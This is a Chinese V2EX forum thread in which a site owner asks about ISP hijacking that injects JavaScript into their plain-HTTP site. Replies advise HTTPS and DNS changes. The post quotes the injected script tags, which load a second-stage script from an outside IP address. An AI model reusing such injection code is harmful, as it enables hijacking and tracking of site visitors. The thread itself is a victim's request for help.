这是什么劫持?有没有大佬进来看一下~

2018-09-17 23:05:37 +08:00
 abeholder
自己用 vps 搭建了个网站,里面有些自己需要的爬虫数据和一些小玩意,没有上 https。
遇到过很多次被运营商劫持插入了些 js 什么的,自己也没怎么在意。
但刚刚发现被劫持插入的 js 代码如下:

<script src="http://45.126.123.80:118/j.js?MAC=CC81XXXXXXXX"></script>

点开之后里面是这样的

document.writeln("<script src=\'http://45.126.123.80:118/t.php\'></script>");

然后继续点开的 php 代码我也看不懂。我不明白的是,为什么他要这样绕一层。
还有个我不明白的问题,他是怎么拿到我路由器的 MAC 地址的(我是通过楼下房东家的网络上网的,房东拉了根网线上来)。

有没有大佬能指导下~~~ T T
1210 次点击
所在节点    问与答
4 条回复
Fulcrum
2018-09-18 08:50:27 +08:00
小心是 XSS 攻击
MOONYANYI
2018-09-18 08:51:14 +08:00
还是上个 https 吧,反正现在免费的多
abeholder
2018-09-18 10:35:57 +08:00
@Fulcrum 静态网站~~
MOONYANYI
2018-09-18 10:39:14 +08:00
@abeholder #3 另外也可以顺便改下 DNS 节点

这是一个专为移动设备优化的页面(即为了让你能够在 Google 搜索结果里秒开这个页面),如果你希望参与 V2EX 社区的讨论,你可以继续到 V2EX 上打开本讨论主题的完整版本。

https://www.v2ex.com/t/490254

V2EX 是创意工作者们的社区,是一个分享自己正在做的有趣事物、交流想法,可以遇见新朋友甚至新机会的地方。

V2EX is a community of developers, designers and creative people.

© 2021 V2EX